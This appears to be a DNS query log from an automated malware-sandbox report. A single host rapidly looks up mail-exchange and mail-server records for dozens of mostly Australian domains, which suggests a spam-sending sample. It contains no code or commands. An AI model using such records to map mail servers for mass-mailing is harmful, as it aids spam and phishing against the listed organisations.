                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.916685104 CET8.8.8.8192.168.2.30x4131No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.937807083 CET8.8.8.8192.168.2.30xda9No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.946057081 CET8.8.8.8192.168.2.30x7f9fNo error (0)primusonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.946057081 CET8.8.8.8192.168.2.30x7f9fNo error (0)primusonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.973119020 CET8.8.8.8192.168.2.30xcb0dNo error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.067246914 CET8.8.8.8192.168.2.30xcc90No error (0)mla.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.067246914 CET8.8.8.8192.168.2.30xcc90No error (0)mla.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.088469982 CET8.8.8.8192.168.2.30xf5efNo error (0)cust7610-2.in.mailcontrol.com116.50.58.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.145462036 CET8.8.8.8192.168.2.30x3254No error (0)hsbc.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.145462036 CET8.8.8.8192.168.2.30x3254No error (0)hsbc.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.237787962 CET8.8.8.8192.168.2.30x2efaNo error (0)eedesigns.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.270545006 CET8.8.8.8192.168.2.30xfeb5No error (0)mxb-00299f02.gslb.pphosted.com185.132.180.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.271233082 CET8.8.8.8192.168.2.30x9bebNo error (0)eedesigns-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.271233082 CET8.8.8.8192.168.2.30x9bebNo error (0)eedesigns-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.425967932 CET8.8.8.8192.168.2.30xf946No error (0)edumail.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.474679947 CET8.8.8.8192.168.2.30xb588Server failure (2)vantex.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.478215933 CET8.8.8.8192.168.2.30x962eNo error (0)aussie.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.478215933 CET8.8.8.8192.168.2.30x962eNo error (0)aussie.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.498948097 CET8.8.8.8192.168.2.30x20c5No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.498948097 CET8.8.8.8192.168.2.30x20c5No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.498948097 CET8.8.8.8192.168.2.30x20c5No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.498948097 CET8.8.8.8192.168.2.30x20c5No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.563653946 CET8.8.8.8192.168.2.30x61f2No error (0)soniccomputing.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.568159103 CET8.8.8.8192.168.2.30xd467No error (0)workskil.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.568159103 CET8.8.8.8192.168.2.30xd467No error (0)workskil.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.586519003 CET8.8.8.8192.168.2.30x81f5No error (0)edumail-vic-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.586519003 CET8.8.8.8192.168.2.30x81f5No error (0)edumail-vic-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.586860895 CET8.8.8.8192.168.2.30x3ac3No error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.586860895 CET8.8.8.8192.168.2.30x3ac3No error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.586860895 CET8.8.8.8192.168.2.30x3ac3No error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.586860895 CET8.8.8.8192.168.2.30x3ac3No error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.594857931 CET8.8.8.8192.168.2.30x28d8No error (0)soniccomputing-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.594857931 CET8.8.8.8192.168.2.30x28d8No error (0)soniccomputing-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.595756054 CET8.8.8.8192.168.2.30x2817No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.595756054 CET8.8.8.8192.168.2.30x2817No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.595756054 CET8.8.8.8192.168.2.30x2817No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.632716894 CET8.8.8.8192.168.2.30x4b49No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.762244940 CET8.8.8.8192.168.2.30xf0e8No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.785001040 CET8.8.8.8192.168.2.30x3e7No error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.785001040 CET8.8.8.8192.168.2.30x3e7No error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.853046894 CET8.8.8.8192.168.2.30x9d26No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.853046894 CET8.8.8.8192.168.2.30x9d26No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.853046894 CET8.8.8.8192.168.2.30x9d26No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.871438980 CET8.8.8.8192.168.2.30x3e2cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.930284977 CET8.8.8.8192.168.2.30x5763No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.952748060 CET8.8.8.8192.168.2.30x786aNo error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.952748060 CET8.8.8.8192.168.2.30x786aNo error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.996706963 CET8.8.8.8192.168.2.30x8341No error (0)findtime.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.069386005 CET8.8.8.8192.168.2.30x8a7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.069386005 CET8.8.8.8192.168.2.30x8a7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.069386005 CET8.8.8.8192.168.2.30x8a7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.088164091 CET8.8.8.8192.168.2.30xb588Server failure (2)vantex.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.090094090 CET8.8.8.8192.168.2.30x3276No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.239502907 CET8.8.8.8192.168.2.30x4be0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.239502907 CET8.8.8.8192.168.2.30x4be0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.239502907 CET8.8.8.8192.168.2.30x4be0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.272608042 CET8.8.8.8192.168.2.30x6f53No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.296386003 CET8.8.8.8192.168.2.30x2c07No error (0)findtime.com.au221.121.138.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.297667980 CET8.8.8.8192.168.2.30x1b02No error (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.321563959 CET8.8.8.8192.168.2.30x36b0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.321563959 CET8.8.8.8192.168.2.30x36b0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.321563959 CET8.8.8.8192.168.2.30x36b0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.324846029 CET8.8.8.8192.168.2.30xce4cNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.341519117 CET8.8.8.8192.168.2.30x6a97No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.450109005 CET8.8.8.8192.168.2.30xa6faNo error (0)ac.auone-net.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.589229107 CET8.8.8.8192.168.2.30xf9e0No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.589229107 CET8.8.8.8192.168.2.30xf9e0No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.614401102 CET8.8.8.8192.168.2.30x6da4No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.693118095 CET8.8.8.8192.168.2.30x8c0eName error (3)templetonknight.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.708621025 CET8.8.8.8192.168.2.30x7d33No error (0)mx01.auone-net.jp27.86.106.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.724003077 CET8.8.8.8192.168.2.30x780cNo error (0)student.adelaide.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.724003077 CET8.8.8.8192.168.2.30x780cNo error (0)student.adelaide.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.758316994 CET8.8.8.8192.168.2.30x2f83No error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.758316994 CET8.8.8.8192.168.2.30x2f83No error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.758316994 CET8.8.8.8192.168.2.30x2f83No error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.758316994 CET8.8.8.8192.168.2.30x2f83No error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.853415966 CET8.8.8.8192.168.2.30x5f56No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.853415966 CET8.8.8.8192.168.2.30x5f56No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.853415966 CET8.8.8.8192.168.2.30x5f56No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.875494957 CET8.8.8.8192.168.2.30xa5c4No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.888490915 CET8.8.8.8192.168.2.30x21d2No error (0)coffeeautomatico.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.888490915 CET8.8.8.8192.168.2.30x21d2No error (0)coffeeautomatico.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.888490915 CET8.8.8.8192.168.2.30x21d2No error (0)coffeeautomatico.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.955694914 CET8.8.8.8192.168.2.30xffceNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.955694914 CET8.8.8.8192.168.2.30xffceNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.955694914 CET8.8.8.8192.168.2.30xffceNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.985562086 CET8.8.8.8192.168.2.30xb0No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.031686068 CET8.8.8.8192.168.2.30x5daeNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.078866959 CET8.8.8.8192.168.2.30x841dNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.204360008 CET8.8.8.8192.168.2.30x8a9aNo error (0)mx2.nameserver.net.au103.42.110.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.222735882 CET8.8.8.8192.168.2.30xd057No error (0)blundstone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.256197929 CET8.8.8.8192.168.2.30xc699No error (0)blundstone-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.256197929 CET8.8.8.8192.168.2.30xc699No error (0)blundstone-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.323410034 CET8.8.8.8192.168.2.30xb587No error (0)nanosonics.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.360131025 CET8.8.8.8192.168.2.30xbfd9No error (0)nanosonics-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.360131025 CET8.8.8.8192.168.2.30xbfd9No error (0)nanosonics-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.377578020 CET8.8.8.8192.168.2.30x2198No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.377578020 CET8.8.8.8192.168.2.30x2198No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.396344900 CET8.8.8.8192.168.2.30xbf05No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
